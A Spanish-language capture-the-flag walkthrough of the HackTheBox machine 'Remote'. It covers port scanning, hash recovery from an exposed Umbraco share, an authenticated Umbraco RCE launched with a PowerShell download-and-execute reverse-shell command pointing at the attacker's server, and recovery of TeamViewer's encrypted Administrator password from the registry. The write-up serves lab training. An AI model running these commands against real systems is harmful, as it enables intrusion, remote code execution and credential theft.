# REMOTE

![alt text](img/remote.png "remote")

**Comienzo comprobando que la máquina está activa y tengo conectividad, después enumero los puertos abiertos:**

```
ping -c1 10.10.10.180
nmap -Pn -p- --open -T5 -v -n 10.10.10.180 -oG allPorts
```

![alt text](img/remote1.png "remote")

**Con la función
[extractPorts](https://s4vitar.github.io/bspwm-configuration-files/)
 copio los puertos abiertos para detectar versiones de los servicios:**

```
extractPorts allPorts
nmap -Pn -sC -sV -p 21,80,111,135,139,445,5985,47001,49664,49666,49667,49679,49680 10.10.10.180 -oN targeted 
```

![alt text](img/remote2.png "remote")

**Me llama la atención el servicio FTP con Anonymous login allowed pero me conecto y no veo archivos ni puedo subir nada. Parece que tiene un NFS corriendo, veo qué está compartiendo y monto el dispositivo en mi máquina:**

![alt text](img/remote3.png "remote")

**Con el comando tree se puede mostrar de forma bastante visual el contenido recursivo de un directorio, en el caso de mount/ es abrumador. Parece que tiene Umbraco instalado, investigando un poco veo que se trata de un CMS, busco "umbraco password config file" y veo que se almacenan en App_Data/Umbraco.sdf en forma de hash, para poder examinar el archivo parece que hay que instalar alguna herramienta y antes de eso prefiero intentar hacer una trampa por si hay suerte...**

![alt text](img/remote4.png "remote")

**Esta vez ha colado :) pasandole el hash a cualquier buscador veo que está en texto plano en varias bases de datos de hashes: "baconandcheese". Ya tengo credenciales, ahora a ver como puedo usarlas. Después de investigar el servicio web del puerto 80 sin ver nada extraño se me ocurre buscar exploits para Umbraco:**

```
searchsploit umbraco
```

**Me devuelve tres exploits: uno de metasploit, un XSS y un RCE con autenticación. Tiene buena pinta, me copio el RCE al directorio de trabajo y lo investigo un poco:**

```
searchsploit -m aspx/webapps/46153.py
searchsploit -x aspx/webapps/46153.py
```

![alt text](img/remote5.png "remote")


**Veo que el host y las credenciales van hardcodeadas, además ejecuta una calculadora como PoC y a mi me interesa que ejecute una reverse shell, intento hacer cambios para que funcione como quiero pero no tengo los conocimientos necesarios, por suerte en internet encuentro una
 [versión del exploit](https://github.com/noraj/Umbraco-RCE)
 que permite pasar como argumentos el host, credenciales y el comando a ejecutar. Para conseguir la shell con un solo comando uso una
 [reverse shell](exploit/Invoke-PowerShellTcp.ps1)
 de este modo:**

**La comparto por http, pongo nc a la escucha y con un solo comando se descarga y lanza la shell inversa**

```
sudo python3 -m http.server 80
rlwrap nc -nvlp 1234
python exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180' -c powershell -a "IEX(New-Object Net.Webclient).downloadString('http://10.10.14.139/Invoke-PowerShellTcp.ps1')"
```

![alt text](img/remote6.png "remote")

**pwned!:) Ya tengo shell, ahora volver a enumerar para escalar privilegios. Antes de subir un script de enumeración exploro el sistema en busca de pistas, encuentro C:\"Program Files (x86)"\TeamViewer , me llama la atención que no es una aplicación por defecto y que además la máquina se llama remote. Los exploits que encuentro de TeamViewer o no son compatibles con la versión o no me interesan para este caso, haciendo un par de búsquedas veo
[este artículo](https://whynotsecurity.com/blog/teamviewer/)
del usuario que descubrió recientemente una vulnerabilidad en este software, en vez de guardar un hash de las contraseñas, ¡las guarda encriptadas con AES-128-CBC! Uso su script de python, solamente hay que hacer una consulta al registro para copiar la contraseña encriptada y pegarla en el script:**

```
reg query "HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7"
```

![alt text](img/remote7.png "remote")

**Ya tengo la contraseña de Administrator, me conecto con evil-winrm y puedo visualizar la flag:**

![alt text](img/remote8.png "remote")